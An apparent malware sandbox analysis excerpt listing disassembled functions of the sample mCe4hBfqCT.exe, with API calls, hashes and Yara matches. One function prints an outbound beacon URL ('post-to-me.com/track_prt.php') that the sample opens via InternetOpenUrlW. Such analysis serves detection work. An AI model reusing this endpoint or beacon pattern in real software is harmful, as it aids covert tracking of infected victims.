                                                  • GetLastError.KERNEL32(?,?,0303AA0C,?,00000000,?,0303CE06,0301249A,00000000,?,00451F20), ref: 03042165
                                                  • _free.LIBCMT ref: 03042198
                                                  • _free.LIBCMT ref: 030421C0
                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421CD
                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 030421D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                  • Instruction ID: dce7037b8c15760803852c4db82cdac8750db02a0d5cbec19b209b0d3fb37b35
                                                  • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                  • Instruction Fuzzy Hash: 3CF0F9FE24770137C251F328BC09B5E265D9FD2A63B150534F914D62E0EE60C7124529
                                                  Function 00417940 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                    • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                    • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                  • String ID:
                                                  • API String ID: 4266703842-0
                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                  Function 03027BA7 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 030229C4: TlsGetValue.KERNEL32(?,?,03020DE2,03022EEF,00000000,?,03020DC0,?,?,?,00000000,?,00000000), ref: 030229CA
                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 03027BD1
                                                    • Part of subcall function 0303123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 03031261
                                                    • Part of subcall function 0303123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0303127A
                                                    • Part of subcall function 0303123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 030312F0
                                                    • Part of subcall function 0303123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 030312F8
                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 03027BDF
                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 03027BE9
                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 03027BF3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03027C11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                  • String ID:
                                                  • API String ID: 4266703842-0
                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction ID: 06a4d338f10dcb15f70b4874f590a2e2305cd90d08ca0bfc5942635ebe7fff9a
                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                  • Instruction Fuzzy Hash: 8BF0F63DA023386BCE26F3759810AAEFF6E9FC1A20B04416AE4115B250DF259B1587C5
                                                  Function 00439E65 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00439E7D
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 00439E8F
                                                  • _free.LIBCMT ref: 00439EA1
                                                  • _free.LIBCMT ref: 00439EB3
                                                  • _free.LIBCMT ref: 00439EC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                  Function 0304A0CC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0304A0E4
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304A0F6
                                                  • _free.LIBCMT ref: 0304A108
                                                  • _free.LIBCMT ref: 0304A11A
                                                  • _free.LIBCMT ref: 0304A12C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction ID: 4c622102af12adcd3d278a54835b663a5e636dbc89b01b71cef63ff6ced56c30
                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                  • Instruction Fuzzy Hash: 9EF068B65473006BC5A0EB5CF4C2C46B3D9AA40391B584965F014DB710CF71FDA08A59
                                                  Function 0043174A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00431768
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 0043177A
                                                  • _free.LIBCMT ref: 0043178D
                                                  • _free.LIBCMT ref: 0043179E
                                                  • _free.LIBCMT ref: 004317AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                  Function 0041CCE5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                  • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                  • String ID:
                                                  • API String ID: 2583373041-0
                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                  Function 030419B1 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 030419CF
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 030419E1
                                                  • _free.LIBCMT ref: 030419F4
                                                  • _free.LIBCMT ref: 03041A05
                                                  • _free.LIBCMT ref: 03041A16
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction ID: e62d83e5fe4cfcc7d47dc7009fe0d8ef6ab6f9b040ca998fea84c3e9bd43f8a0
                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                  • Instruction Fuzzy Hash: 27F05BB8C013125BCEA1BF14BC814447B60EF0966270452B6F4129B372CB74DAB2DF8E
                                                  Function 0302CF4C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0302CF56
                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0302CF87
                                                  • GetCurrentThread.KERNEL32 ref: 0302CF90
                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0302CFA3
                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0302CFAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                  • String ID:
                                                  • API String ID: 2583373041-0
                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction ID: 4c16fdee918c6006098b37853c977795c28cf62169faf5c567a378ca790f74a7
                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                  • Instruction Fuzzy Hash: 87F0A73A2027209BC665FF20F9508FF7FB59FC4510300058DE5970A554CF25A906D721
                                                  Function 03012E8B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 03012EAE
                                                    • Part of subcall function 03011321: _wcslen.LIBCMT ref: 03011328
                                                    • Part of subcall function 03011321: _wcslen.LIBCMT ref: 03011344
                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 030130C6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen_wcslen
                                                  • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                  • API String ID: 3381584094-4083784958
                                                  • Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                  • Instruction ID: 6b883939a5f70a83333d2e8320c8988a4d8a6b85c4e95a68b575c080b2cdb688
                                                  • Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
                                                  • Instruction Fuzzy Hash: 23517495A66344A8E320DFB0BC52B753378EF58712F10643BE518CB2B2E7B19944875E
                                                  Function 0042F738 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mCe4hBfqCT.exe,00000104), ref: 0042F773
                                                  • _free.LIBCMT ref: 0042F83E
                                                  • _free.LIBCMT ref: 0042F848
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                  • API String ID: 2506810119-1342319500
                                                  • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                  • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                  • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                  • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                  Function 0303F99F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mCe4hBfqCT.exe,00000104), ref: 0303F9DA
                                                  • _free.LIBCMT ref: 0303FAA5
                                                  • _free.LIBCMT ref: 0303FAAF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                  • API String ID: 2506810119-1342319500
                                                  • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                  • Instruction ID: 356f3ee380423a8d96e7ca6e4964aca92a65038e7e5488f2125150831c6cbfd5
                                                  • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                  • Instruction Fuzzy Hash: FA3183B5E06759EFDB21DF99DC80D9EBBFCEF8A710B1441A6E804DB211D6709A40CB50
                                                  Function 03033044 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 03033071
                                                    • Part of subcall function 03028AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 03028ADD
                                                  • SafeSQueue.LIBCONCRT ref: 0303308A
                                                  • Concurrency::location::_Assign.LIBCMT ref: 0303314A
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0303316B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03033179
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 3496964030-1785270423
                                                  • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                  • Instruction ID: 3e9956d6795ba225c249b8364febd88bca47bd6cc30038942c3810373f74a123
                                                  • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                  • Instruction Fuzzy Hash: 0B21C2397016119FCF15EF69C8D0AADBBA9EF86710F098199DD468F252CB70E805CB91
                                                  Function 03039053 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,030421E4), ref: 0303E220
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,030421E4), ref: 0303E25A
                                                  • RtlExitUserThread.NTDLL(00000000), ref: 0303E261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                  • String ID: 11@
                                                  • API String ID: 1079102050-1785270423
                                                  • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                  • Instruction ID: e29a3a2b89e63746d83ebc57405c8d621b98ece2fd0d61ddf31e98d8402030d9
                                                  • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                  • Instruction Fuzzy Hash: CB113AB9646305ABEB04FB70DD0ABEE37A8AF87B00F140678F9006F1D1DBA59600C660
                                                  Function 0303E204 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,030421E4), ref: 0303E220
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,030421E4), ref: 0303E25A
                                                  • RtlExitUserThread.NTDLL(00000000), ref: 0303E261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                  • String ID: 11@
                                                  • API String ID: 1079102050-1785270423
                                                  • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                  • Instruction ID: ebb52f0b4f71197ffc1ad593b104e4d03b409758803b5923ad2ff0b4a2790e21
                                                  • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                  • Instruction Fuzzy Hash: EE114CB9646305ABEB04FB70DD0ABEE37A8AF87B00F140678FA046F1D1DBB55600C660
                                                  Function 0040EF4B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: 11@$f(@
                                                  • API String ID: 1452528299-1277599000
                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                  Function 00425F1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                    • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                    • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                  • String ID: 11@
                                                  • API String ID: 2684344702-1785270423
                                                  • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                  • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                  Function 03036182 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 03036194
                                                    • Part of subcall function 03035161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 0303517E
                                                    • Part of subcall function 03035161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 03035193
                                                  • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 030361C7
                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 030361F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                  • String ID: 11@
                                                  • API String ID: 2684344702-1785270423
                                                  • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction ID: 38aafed87f9b8bcfd2ed11c4c49a5f298f715aea0a21a0fb251cd8329520dc26
                                                  • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                  • Instruction Fuzzy Hash: 7C018479601219AFCF15DF58C4809AE77FEEFCA354B1800A5EC46AB301DA31EE0597A0
                                                  Function 0040D4EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                    • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                    • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                  • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                  • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
